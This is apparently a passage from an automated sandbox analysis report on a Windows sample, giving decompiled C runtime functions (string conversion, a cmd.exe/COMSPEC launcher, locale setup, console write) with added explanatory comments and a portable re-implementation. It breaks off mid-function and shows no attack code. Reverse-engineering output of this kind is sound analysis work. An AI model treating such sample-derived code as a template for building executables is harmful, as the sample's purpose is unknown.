                                                  0x00407989
                                                  0x00000000
                                                  0x00000000
                                                  0x0040798f
                                                  0x00407995
                                                  0x00407995
                                                  0x00000000
                                                  0x00407995
                                                  0x0040795d
                                                  0x00407961
                                                  0x00407966
                                                  0x0040796a
                                                  0x00000000
                                                  0x00000000
                                                  0x00407970
                                                  0x00000000
                                                  0x00407970

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                  • __alloca_probe_16.LIBCMT ref: 00407961
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                  • __alloca_probe_16.LIBCMT ref: 00407A46
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                  • __freea.LIBCMT ref: 00407AB6
                                                    • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004), ref: 00403E6F
                                                  • __freea.LIBCMT ref: 00407ABF
                                                  • __freea.LIBCMT ref: 00407AE4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: 2acbdce31c841228e4f1b43f9461c59ea2f4b9e7753061a6b0d4f9641481498b
                                                  • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                                                  • Opcode Fuzzy Hash: 2acbdce31c841228e4f1b43f9461c59ea2f4b9e7753061a6b0d4f9641481498b
                                                  • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

                                                  C-Code - Quality: 59%
                                                  			E00B0C2F4(void* __ebx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
                                                  				intOrPtr* _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v32;
                                                  				char _v36;
                                                  				intOrPtr _v40;
                                                  				char _v52;
                                                  				void* __ecx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t33;
                                                  				intOrPtr* _t36;
                                                  				intOrPtr _t39;
                                                  				void* _t48;
                                                  				intOrPtr _t55;
                                                  				signed int _t60;
                                                  				signed int _t63;
                                                  				intOrPtr _t76;
                                                  				signed int _t79;
                                                  				void* _t81;
                                                  				signed int _t84;
                                                  				intOrPtr _t86;
                                                  				void* _t90;
                                                  				void* _t91;
                                                  
                                                  				_push(_t62);
                                                  				_t33 = _a16;
                                                  				_t76 = _a8;
                                                  				_push(__ebx);
                                                  				_t60 = _a12;
                                                  				_t79 = 0;
                                                  				_v8 = _t33;
                                                  				_t63 = 0;
                                                  				_t84 = 0;
                                                  				_v12 = 0;
                                                  				L1:
                                                  				while(1) {
                                                  					if(_t63 < _t33) {
                                                  						L10:
                                                  						 *((intOrPtr*)(_t60 + _t63 * 4)) = _t76;
                                                  						_t63 = _t63 + 1;
                                                  						_v12 = _t63;
                                                  						if(_t76 == 0) {
                                                  							_t84 = _t79;
                                                  							_t79 = _t60;
                                                  							goto L15;
                                                  						} else {
                                                  							_t36 = _a4;
                                                  							 *_t36 =  *_t36 + 4;
                                                  							_t76 =  *((intOrPtr*)( *_t36 - 4));
                                                  							_t33 = _v8;
                                                  							_a8 = _t76;
                                                  							continue;
                                                  						}
                                                  					} else {
                                                  						if(_t33 >= 0x7fffffff) {
                                                  							L13:
                                                  							 *((intOrPtr*)(E00AF69E3())) = 0xc;
                                                  							goto L15;
                                                  						} else {
                                                  							_t39 = _t33 + _t33;
                                                  							_push(4);
                                                  							_v8 = _t39;
                                                  							_push(_t39);
                                                  							if(_t60 != _a12) {
                                                  								_t60 = E00B06285(_t84);
                                                  								_t90 = _t90 + 0xc;
                                                  								if(_t60 == 0) {
                                                  									 *((intOrPtr*)(E00AF69E3())) = 0xc;
                                                  									L00AF4D62(_t79);
                                                  									L15:
                                                  									L00AF4D62(_t84);
                                                  									return _t79;
                                                  								} else {
                                                  									L00AF4D62(_t79);
                                                  									L00AF4D62(_t79);
                                                  									goto L9;
                                                  								}
                                                  							} else {
                                                  								_t60 = E00AF4F03(_t63);
                                                  								L00AF4D62(_t84);
                                                  								_t84 = _t60;
                                                  								L00AF4D62(_t79);
                                                  								_t91 = _t90 + 0x10;
                                                  								if(_t60 == 0) {
                                                  									goto L13;
                                                  								} else {
                                                  									_t48 = E00AF08D1(_t60, _v8, _a12, _a16);
                                                  									_t90 = _t91 + 0x10;
                                                  									if(_t48 == 0) {
                                                  										L9:
                                                  										_t63 = _v12;
                                                  										_t84 = _t60;
                                                  										_t76 = _a8;
                                                  										goto L10;
                                                  									} else {
                                                  										_push(_t79);
                                                  										_push(_t79);
                                                  										_push(_t79);
                                                  										_push(_t79);
                                                  										_push(_t79);
                                                  										E00AF68E9();
                                                  										asm("int3");
                                                  										_push(_t63);
                                                  										_push(_t63);
                                                  										_push(_t84);
                                                  										_push(_t79);
                                                  										_t81 = 0;
                                                  										_v52 = 0;
                                                  										if(E00B0C4CD(_t60, _t63, 0, _t84, _v40,  &_v52) == 0) {
                                                  											_v36 = 0;
                                                  											_push( &_v36);
                                                  											_push(_v16);
                                                  											if(E00B0C680(_t60, 0, _t84) == 0) {
                                                  												_t86 = 0;
                                                  												 *_v12 = _v32;
                                                  												_t55 = 0;
                                                  												 *_v8 = _v36;
                                                  											} else {
                                                  												_t86 = _v32;
                                                  												_t81 = 0xffffffff;
                                                  												_t55 = _v36;
                                                  											}
                                                  											L00AF4D62(_t55);
                                                  										} else {
                                                  											_t86 = _v32;
                                                  											_t81 = 0xffffffff;
                                                  										}
                                                  										L00AF4D62(_t86);
                                                  										return _t81;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}
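The listing above (E00B0C2F4) reads as a NULL-terminated pointer-array builder: it copies pointers from a source cursor (`*_a4`, advanced 4 bytes per element) into a destination array, doubles the capacity when the array is full, and sets errno to 0xc (ENOMEM) instead of growing once the element count would reach 0x7fffffff. The following portable C is an added illustration of that growth pattern, written for this page; it is not code from the report or the sample, and the function names, the initial capacity of 4 and the use of calloc/realloc throughout (the original switches from a caller-owned buffer to the heap on the first growth) are my simplifications.

```c
/* Added example: a portable re-implementation of the growth pattern seen in
 * E00B0C2F4.  Names, initial capacity and allocation strategy are assumptions. */
#include <errno.h>
#include <limits.h>
#include <stdlib.h>
#include <string.h>

/* Upper bound on element count, mirroring the 0x7fffffff check in the listing. */
#define MAX_ELEMENTS 0x7fffffffu

/* Copy the NULL-terminated pointer list `src` into a freshly allocated,
 * NULL-terminated array.  Capacity doubles on demand.  Returns NULL and sets
 * errno = ENOMEM when allocation fails or the capacity would exceed the bound. */
void **collect_pointers(void *const *src) {
    size_t cap = 4;                      /* assumed initial capacity */
    size_t n = 0;
    void **dst = calloc(cap, sizeof *dst);
    if (dst == NULL) {
        errno = ENOMEM;
        return NULL;
    }
    for (;;) {
        if (n < cap) {
            dst[n++] = *src;             /* store element (or the terminator) */
            if (*src == NULL)
                return dst;              /* terminator copied: done */
            ++src;                       /* advance the source cursor */
            continue;
        }
        /* Array full: refuse to grow past the bound rather than overflow. */
        if (cap >= MAX_ELEMENTS) {
            free(dst);
            errno = ENOMEM;
            return NULL;
        }
        size_t newcap = cap * 2;
        void **grown = realloc(dst, newcap * sizeof *grown);
        if (grown == NULL) {
            free(dst);
            errno = ENOMEM;
            return NULL;
        }
        /* Zero the new tail so a partially filled array is always terminated. */
        memset(grown + cap, 0, (newcap - cap) * sizeof *grown);
        dst = grown;
        cap = newcap;
    }
}

/* Number of entries before the NULL terminator. */
size_t count_pointers(void *const *list) {
    size_t n = 0;
    while (list[n] != NULL)
        n++;
    return n;
}

/* Demo on a constructed input that forces two growth steps (4 -> 8 -> 16).
 * Returns 1 on success, 0 on any mismatch. */
int demo_collect(void) {
    const char *words[] = {"a", "b", "c", "d", "e", "f", "g", "h", "i", NULL};
    void **out = collect_pointers((void *const *)words);
    if (out == NULL)
        return 0;
    int ok = count_pointers(out) == 9
          && out[9] == NULL
          && out[0] == (void *)words[0]
          && out[8] == (void *)words[8];
    free(out);
    return ok;
}
```

The bound check sits before the multiplication, so `cap * 2` can never wrap, and the tail is zeroed after every growth so the array stays NULL-terminated even if the copy were interrupted; those two properties are what the ENOMEM path and the `_recalloc`/`_calloc` calls in the listing appear to provide.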

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 64dc16bb04fa401ccd08bd8973b9b87391c85e4311ec7b539b9bedb34a7e9f79
                                                  • Instruction ID: fa814bc2aa5693d687dd733ead897ea523cc3437065614cbd7a423d2b047a210
                                                  • Opcode Fuzzy Hash: 64dc16bb04fa401ccd08bd8973b9b87391c85e4311ec7b539b9bedb34a7e9f79
                                                  • Instruction Fuzzy Hash: 5D41A972600208EFDF14EF99D98197EBFF9EF85320B248299FE1497391DB709D009665

                                                  C-Code - Quality: 59%
                                                  			E00AE368A(signed int __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				intOrPtr _v20;
                                                  				char* _v24;
                                                  				char* _v28;
                                                  				char* _v32;
                                                  				intOrPtr _v56;
                                                  				signed int _v68;
                                                  				char _v88;
                                                  				intOrPtr* _v112;
                                                  				intOrPtr* _v116;
                                                  				signed int _t37;
                                                  				void* _t40;
                                                  				char* _t41;
                                                  				signed int* _t48;
                                                  				signed int _t50;
                                                  				intOrPtr* _t51;
                                                  				signed int _t54;
                                                  				signed int _t56;
                                                  				void* _t59;
                                                  				char* _t60;
                                                  				signed int* _t67;
                                                  				signed int _t69;
                                                  				intOrPtr* _t70;
                                                  				signed int _t73;
                                                  				void* _t95;
                                                  				signed int _t97;
                                                  				intOrPtr _t99;
                                                  				signed int _t102;
                                                  				signed int _t110;
                                                  				signed int _t111;
                                                  				void* _t113;
                                                  				signed int _t114;
                                                  				void* _t117;
                                                  
                                                  				_t95 = __edx;
                                                  				_t78 = __ebx;
                                                  				_t37 =  *0xb26018; // 0xb47fd95f
                                                  				_v8 = _t37 ^ _t110;
                                                  				_push(__ebx);
                                                  				_push(__esi);
                                                  				_push(__edi);
                                                  				_t97 = _a4;
                                                  				_t102 = 0;
                                                  				_v28 = 0;
                                                  				_t40 = L00AFDEE9( &_v28, 0, "COMSPEC");
                                                  				_t114 = _t113 + 0xc;
                                                  				if(_t40 == 0 || _t40 != 0x16) {
                                                  					if(_t97 != 0) {
                                                  						_t41 = _v28;
                                                  						_v24 = _t41;
                                                  						_v20 = "/c";
                                                  						_v16 = _t97;
                                                  						_v12 = _t102;
                                                  						if(_t41 == 0) {
                                                  							L12:
                                                  							_push(_t102);
                                                  							_v24 = "cmd.exe";
                                                  							_t102 = E00AFF2FC(_t78, _t95, _t97, _t102, _t102, "cmd.exe",  &_v24);
                                                  						} else {
                                                  							_t97 =  *((intOrPtr*)(E00AF69E3()));
                                                  							_t48 = E00AF69E3();
                                                  							_push(_t102);
                                                  							 *_t48 = _t102;
                                                  							_push( &_v24);
                                                  							_t50 = L00AFEB59(_t78, _t97, _t102, _t102, _v24);
                                                  							_t114 = _t114 + 0x10;
                                                  							_t78 = _t50;
                                                  							_t51 = E00AF69E3();
                                                  							if(_t78 == 0xffffffff) {
                                                  								if( *_t51 == 2 ||  *((intOrPtr*)(E00AF69E3())) == 0xd) {
                                                  									 *((intOrPtr*)(E00AF69E3())) = _t97;
                                                  									goto L12;
                                                  								} else {
                                                  									_t102 = _t102 | 0xffffffff;
                                                  								}
                                                  							} else {
                                                  								 *_t51 = _t97;
                                                  								_t102 = _t78;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						if(_v28 != _t102) {
                                                  							_t54 = E00AFF44F(_t78, _t102, _v28, _t102);
                                                  							asm("sbb esi, esi");
                                                  							_t102 =  ~_t54 + 1;
                                                  						}
                                                  					}
                                                  					L00AF4D62(_v28);
                                                  					return L00AD1DCD(_v8 ^ _t110);
                                                  				} else {
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					E00AF68E9();
                                                  					asm("int3");
                                                  					_push(_t110);
                                                  					_t111 = _t114;
                                                  					_t56 =  *0xb26018; // 0xb47fd95f
                                                  					_v68 = _t56 ^ _t111;
                                                  					_push(__ebx);
                                                  					_push(0);
                                                  					_push(_t97);
                                                  					_t99 = _v56;
                                                  					_t106 = 0;
                                                  					_v88 = 0;
                                                  					_t59 = L00AFDF07( &_v88, 0, L"COMSPEC");
                                                  					_t117 = _t114 - 0x18 + 0xc;
                                                  					if(_t59 == 0 || _t59 != 0x16) {
                                                  						if(_t99 != 0) {
                                                  							_t60 = _v32;
                                                  							_v28 = _t60;
                                                  							_v24 = L"/c";
                                                  							_v20 = _t99;
                                                  							_v16 = _t106;
                                                  							if(_t60 == 0) {
                                                  								L27:
                                                  								_push(_t106);
                                                  								_v28 = L"cmd.exe";
                                                  								_t106 = E00AFF354(_t78, _t95, _t99, _t106, _t106, L"cmd.exe",  &_v28);
                                                  							} else {
                                                  								_t99 =  *((intOrPtr*)(E00AF69E3()));
                                                  								_t67 = E00AF69E3();
                                                  								_push(_t106);
                                                  								 *_t67 = _t106;
                                                  								_push( &_v28);
                                                  								_t69 = E00AFEBB1(_t78, _t99, _t106, _t106, _v28);
                                                  								_t117 = _t117 + 0x10;
                                                  								_t78 = _t69;
                                                  								_t70 = E00AF69E3();
                                                  								if(_t78 == 0xffffffff) {
                                                  									if( *_t70 == 2 ||  *((intOrPtr*)(E00AF69E3())) == 0xd) {
                                                  										 *((intOrPtr*)(E00AF69E3())) = _t99;
                                                  										goto L27;
                                                  									} else {
                                                  										_t106 = _t106 | 0xffffffff;
                                                  									}
                                                  								} else {
                                                  									 *_t70 = _t99;
                                                  									_t106 = _t78;
                                                  								}
                                                  							}
                                                  						} else {
                                                  							if(_v32 != _t106) {
                                                  								_t73 = E00AFF377(_t78, _t106, _v32, _t106);
                                                  								asm("sbb esi, esi");
                                                  								_t106 =  ~_t73 + 1;
                                                  							}
                                                  						}
                                                  						L00AF4D62(_v32);
                                                  						return L00AD1DCD(_v12 ^ _t111);
                                                  					} else {
                                                  						_push(0);
                                                  						_push(0);
                                                  						_push(0);
                                                  						_push(0);
                                                  						_push(0);
                                                  						E00AF68E9();
                                                  						asm("int3");
                                                  						_push(_t111);
                                                  						return E00AFF44F(__ebx, 0,  *_v116,  *_v112);
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
• Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
• Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
• Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: COMSPEC$COMSPEC$cmd.exe$cmd.exe
                                                  • API String ID: 269201875-1422091540
                                                  • Opcode ID: e019e88f8e65786c43b5dec3febe7fa933df5aed4592fd4aa121304db8f1f39e
                                                  • Instruction ID: 4564f1d776a46b0d06529a3ce702f3999d0a59b1100e768ca0b6d6496293ea89
                                                  • Opcode Fuzzy Hash: e019e88f8e65786c43b5dec3febe7fa933df5aed4592fd4aa121304db8f1f39e
                                                  • Instruction Fuzzy Hash: 4351BCB2D00119AF8F21AFEACD464BFBBB8DF55720B11016AF905A7261DA719F01C7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E00B04331(void* __edx, char _a4) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				char _v28;
                                                  				void* _t53;
                                                  				void _t57;
                                                  				intOrPtr _t58;
                                                  				intOrPtr _t59;
                                                  				intOrPtr _t60;
                                                  				intOrPtr _t61;
                                                  				signed int _t64;
                                                  				signed int _t76;
                                                  				signed int _t78;
                                                  				signed int _t82;
                                                  				signed int _t86;
                                                  				char _t92;
                                                  				char _t99;
                                                  				void* _t100;
                                                  				signed int _t103;
                                                  				void* _t106;
                                                  				char _t118;
                                                  				intOrPtr* _t119;
                                                  				void* _t122;
                                                  				char* _t124;
                                                  				signed int _t128;
                                                  				intOrPtr* _t133;
                                                  				void* _t134;
                                                  				intOrPtr* _t135;
                                                  				char* _t140;
                                                  
                                                  				_t122 = __edx;
                                                  				_t99 = _a4;
                                                  				_v28 = _t99;
                                                  				_v24 = 0;
                                                  				if( *((intOrPtr*)(_t99 + 0xb0)) != 0 ||  *((intOrPtr*)(_t99 + 0xac)) != 0) {
                                                  					_v16 = 1;
                                                  					_t53 = E00AF4F03(_t100, 1, 0x50);
                                                  					_v8 = _t53;
                                                  					if(_t53 != 0) {
                                                  						_t103 = 0x14;
                                                  						memcpy(_t53,  *(_t99 + 0x88), _t103 << 2);
                                                  						_t133 = L00AF4D9C(0, 4);
                                                  						_t128 = 0;
                                                  						_v12 = _t133;
                                                  						L00AF4D62(0);
                                                  						_pop(_t106);
                                                  						if(_t133 != 0) {
                                                  							 *_t133 = 0;
                                                  							if( *((intOrPtr*)(_t99 + 0xb0)) == 0) {
                                                  								_t134 = _v8;
                                                  								_t57 =  *0xb26830; // 0xb26828
                                                  								 *_t134 = _t57;
                                                  								_t58 =  *0xb26834; // 0xb27d6c
                                                  								 *((intOrPtr*)(_t134 + 4)) = _t58;
                                                  								_t59 =  *0xb26838; // 0xb27d6c
                                                  								 *((intOrPtr*)(_t134 + 8)) = _t59;
                                                  								_t60 =  *0xb26860; // 0xb2682c
                                                  								 *((intOrPtr*)(_t134 + 0x30)) = _t60;
                                                  								_t61 =  *0xb26864; // 0xb27d70
                                                  								 *((intOrPtr*)(_t134 + 0x34)) = _t61;
                                                  								L18:
                                                  								 *_v12 = 1;
                                                  								if(_t128 != 0) {
                                                  									 *_t128 = 1;
                                                  								}
                                                  								goto L20;
                                                  							}
                                                  							_t135 = L00AF4D9C(_t106, 4);
                                                  							_v20 = _t135;
                                                  							L00AF4D62(0);
                                                  							if(_t135 == 0) {
                                                  								L11:
                                                  								L00AF4D62(_v8);
                                                  								L00AF4D62(_v12);
                                                  								return _v16;
                                                  							}
                                                  							 *_t135 = 0;
                                                  							_t129 =  *((intOrPtr*)(_t99 + 0xb0));
                                                  							_t76 = E00B0F5EC(_t122,  &_v28, 1,  *((intOrPtr*)(_t99 + 0xb0)), 0xe, _v8);
                                                  							_t78 = E00B0F5EC(_t122,  &_v28, 1,  *((intOrPtr*)(_t99 + 0xb0)), 0xf, _v8 + 4);
                                                  							_v16 = _v8 + 8;
                                                  							_t82 = E00B0F5EC(_t122,  &_v28, 1,  *((intOrPtr*)(_t99 + 0xb0)), 0x10, _v8 + 8);
                                                  							_t86 = E00B0F5EC(_t122,  &_v28, 2, _t129, 0xe, _v8 + 0x30);
                                                  							if((E00B0F5EC(_t122,  &_v28, 2, _t129, 0xf, _v8 + 0x34) | _t76 | _t78 | _t82 | _t86) == 0) {
                                                  								_t124 =  *_v16;
                                                  								while( *_t124 != 0) {
                                                  									_t118 =  *_t124;
                                                  									_t92 = _t118 - 0x30;
                                                  									if(_t92 > 9) {
                                                  										if(_t118 != 0x3b) {
                                                  											L15:
                                                  											_t124 = _t124 + 1;
                                                  											continue;
                                                  										}
                                                  										_t140 = _t124;
                                                  										do {
                                                  											_t119 = _t140 + 1;
                                                  											 *_t140 =  *_t119;
                                                  											_t140 = _t119;
                                                  										} while ( *_t140 != 0);
                                                  										continue;
                                                  									}
                                                  									 *_t124 = _t92;
                                                  									goto L15;
                                                  								}
                                                  								_t128 = _v20;
                                                  								_t134 = _v8;
                                                  								goto L18;
                                                  							}
                                                  							E00B042C8(_v8);
                                                  							_v16 = _v16 | 0xffffffff;
                                                  							goto L11;
                                                  						}
                                                  						L00AF4D62(_v8);
                                                  						return 1;
                                                  					}
                                                  					return 1;
                                                  				} else {
                                                  					_t128 = 0;
                                                  					_v12 = 0;
                                                  					_t134 = 0xb26830;
                                                  					L20:
                                                  					_t64 =  *(_t99 + 0x80);
                                                  					if(_t64 != 0) {
                                                  						asm("lock dec dword [eax]");
                                                  					}
                                                  					if( *((intOrPtr*)(_t99 + 0x7c)) != 0) {
                                                  						asm("lock xadd [ecx], eax");
                                                  						if((_t64 | 0xffffffff) == 0) {
                                                  							L00AF4D62( *((intOrPtr*)(_t99 + 0x7c)));
                                                  							L00AF4D62( *(_t99 + 0x88));
                                                  						}
                                                  					}
                                                  					 *((intOrPtr*)(_t99 + 0x7c)) = _v12;
                                                  					 *(_t99 + 0x80) = _t128;
                                                  					 *(_t99 + 0x88) = _t134;
                                                  					return 0;
                                                  				}
                                                  			}
                                                  0x00b04359
                                                  0x00b0435c
                                                  0x00b044b9
                                                  0x00b044b9
                                                  0x00b044c1
                                                  0x00b044c3
                                                  0x00b044c3
                                                  0x00b044cb
                                                  0x00b044d0
                                                  0x00b044d4
                                                  0x00b044d9
                                                  0x00b044e4
                                                  0x00b044ea
                                                  0x00b044d4
                                                  0x00b044ee
                                                  0x00b044f3
                                                  0x00b044f9
                                                  0x00000000
                                                  0x00b044f9

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 22bd4376cfdbdde1de92a95c6721b4043566e78a333bcffdc260f607892eccf6
                                                  • Instruction ID: 8a795263933c9b7142411508349903e18cd967f727ed15a2cf72daf2040e4e89
                                                  • Opcode Fuzzy Hash: 22bd4376cfdbdde1de92a95c6721b4043566e78a333bcffdc260f607892eccf6
                                                  • Instruction Fuzzy Hash: 3B6174B1900215AFDB20DFA9C841BAEBBF5FF58710F1441AAEA45EB381EB709D41CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			/* Console branch of the CRT's text-mode _write, statically linked into the sample: convert one
                                                  			   character at a time with an mbtowc-style call, re-encode it with WideCharToMultiByte for
                                                  			   GetConsoleCP(), WriteFile it, follow LF with CR, and park a trailing lead byte in the handle's
                                                  			   ioinfo entry for the next call. This layout matches the UCRT's write_double_translated_ansi_nolock.
                                                  			   _a4 is the hidden pointer to the returned {error_code, char_count, lf_count} triple; _a8 = CRT fd,
                                                  			   _a12 = buffer, _a16 = byte count. E00AFB377 (labelled __fassign by the sandbox) is called like
                                                  			   mbtowc: (dest wchar, source bytes, 1 or 2), -1 on failure. Library code, not sample-specific
                                                  			   logic; the same routine is decompiled again below as E00408226. */
                                                  			E00AF99A8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                  				signed int _v8;
                                                  				signed char _v15;
                                                  				char _v16;
                                                  				void _v24;
                                                  				short _v28;
                                                  				char _v31;
                                                  				void _v32;
                                                  				signed char* _v36;
                                                  				long _v40;
                                                  				intOrPtr _v44;
                                                  				signed char* _v48;
                                                  				void* _v52;
                                                  				signed int _v56;
                                                  				int _v60;
                                                  				long _v64;
                                                  				signed int _t81;
                                                  				signed int _t83;
                                                  				int _t89;
                                                  				signed char* _t91;
                                                  				void* _t99;
                                                  				signed char* _t100;
                                                  				long _t104;
                                                  				void _t112;
                                                  				void* _t121;
                                                  				signed int _t126;
                                                  				signed int _t128;
                                                  				signed char _t132;
                                                  				signed char _t138;
                                                  				intOrPtr _t139;
                                                  				signed int _t141;
                                                  				signed char* _t143;
                                                  				intOrPtr* _t145;
                                                  				signed int _t146;
                                                  				void* _t147;
                                                  
                                                  				_t81 =  *0xb26018; // 0xb47fd95f  (stack-protector cookie, verified by L00AD1DCD on return)
                                                  				_v8 = _t81 ^ _t146;
                                                  				_t83 = _a8;
                                                  				_t128 = _t83 >> 6;                        // __pioinfo[fh >> 6] ...
                                                  				_t126 = (_t83 & 0x0000003f) * 0x30;       // ... [fh & 0x3f], 0x30-byte ioinfo entries
                                                  				_t143 = _a12;
                                                  				_v48 = _t143;
                                                  				_v56 = _t128;
                                                  				_v52 =  *((intOrPtr*)( *((intOrPtr*)(0xb279f0 + _t128 * 4)) + _t126 + 0x18)); // OS HANDLE of fh (ioinfo+0x18), passed to WriteFile below
                                                  				_v44 = _a16 + _t143;                      // end of the caller's buffer
                                                  				_t89 = GetConsoleCP();
                                                  				_t145 = _a4;
                                                  				_v60 = _t89;
                                                  				 *_t145 = 0;
                                                  				 *((intOrPtr*)(_t145 + 4)) = 0;
                                                  				 *((intOrPtr*)(_t145 + 8)) = 0;
                                                  				_t91 = _t143;
                                                  				if(_t91 < _v44) {
                                                  					_v36 =  &(_t91[1]);
                                                  					do {
                                                  						_v28 = 0;
                                                  						_v31 =  *_t143;
                                                  						_t139 =  *((intOrPtr*)(0xb279f0 + _v56 * 4));
                                                  						_t132 =  *(_t139 + _t126 + 0x2d);  // per-handle flag byte; bit 2 set = a lead byte from the previous call is parked at +0x2e
                                                  						if((_t132 & 0x00000004) == 0) {
                                                  							// isleadbyte(*pch): E00AFF8A5 yields the ctype table, indexed by the byte; a 16-bit entry with bit 15 (0x8000, _LEADBYTE) clear is a single-byte character
                                                  							if( *((intOrPtr*)(E00AFF8A5(_t126, _t139) + ( *_t143 & 0x000000ff) * 2)) >= 0) {
                                                  								_push(1);
                                                  								_push(_t143);
                                                  								goto L9;
                                                  							} else {
                                                  								if(_v36 >= _v44) {  // lead byte in last position (_v36 == pch + 1 == end): park it for the next call
                                                  									_t141 = _v56;
                                                  									 *((char*)( *((intOrPtr*)(0xb279f0 + _t141 * 4)) + _t126 + 0x2e)) =  *_t143;  // ioinfo+0x2e = parked lead byte
                                                  									 *( *((intOrPtr*)(0xb279f0 + _t141 * 4)) + _t126 + 0x2d) =  *( *((intOrPtr*)(0xb279f0 + _t141 * 4)) + _t126 + 0x2d) | 0x00000004;  // set the "parked" bit
                                                  									 *((intOrPtr*)(_t145 + 4)) =  *((intOrPtr*)(_t145 + 4)) + 1;  // char_count++, then the loop ends
                                                  								} else {
                                                  									_t121 = E00AFB377( &_v28, _t143, 2);  // complete two-byte sequence: convert both bytes into _v28
                                                  									_t147 = _t147 + 0xc;
                                                  									if(_t121 != 0xffffffff) {
                                                  										_t143 =  &(_t143[1]);
                                                  										_t100 =  &(_v36[1]);
                                                  										goto L11;
                                                  									}
                                                  								}
                                                  							}
                                                  						} else {
                                                  							_t138 = _t132 & 0x000000fb;  // clear the "parked" bit ...
                                                  							_v16 =  *((intOrPtr*)(_t139 + _t126 + 0x2e));  // ... and fetch the parked lead byte; it is converted together with *pch (length 2) below
                                                  							_push(2);
                                                  							_v15 = _t138;
                                                  							 *(_t139 + _t126 + 0x2d) = _t138;
                                                  							_push( &_v16);
                                                  							L9:
                                                  							_push( &_v28);
                                                  							_t99 = E00AFB377();  // mbtowc-style conversion of the pushed (source, length) pair into _v28; -1 on failure
                                                  							_t147 = _t147 + 0xc;
                                                  							if(_t99 != 0xffffffff) {
                                                  								_t100 = _v36;
                                                  								L11:
                                                  								_t143 =  &(_t143[1]);
                                                  								_v36 =  &(_t100[1]);
                                                  								_t104 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);  // re-encode the one wide char for the console code page (_v60 = GetConsoleCP())
                                                  								_v64 = _t104;
                                                  								if(_t104 != 0) {
                                                  									if(WriteFile(_v52,  &_v24, _t104,  &_v40, 0) == 0) {  // _v52 = OS handle, _v40 = bytes written
                                                  										L21:
                                                  										 *_t145 = GetLastError();  // result.error_code
                                                  									} else {
                                                  										 *((intOrPtr*)(_t145 + 4)) = _t143 - _v48 +  *((intOrPtr*)(_t145 + 8));  // result.char_count = bytes consumed + CRs added
                                                  										if(_v40 >= _v64) {  // a short write ends the loop
                                                  											if(_v31 != 0xa) {
                                                  												goto L18;
                                                  											} else {
                                                  												_t112 = 0xd;  // source byte was LF: follow it with CR ...
                                                  												_v32 = _t112;
                                                  												if(WriteFile(_v52,  &_v32, 1,  &_v40, 0) == 0) {
                                                  													goto L21;
                                                  												} else {
                                                  													if(_v40 >= 1) {
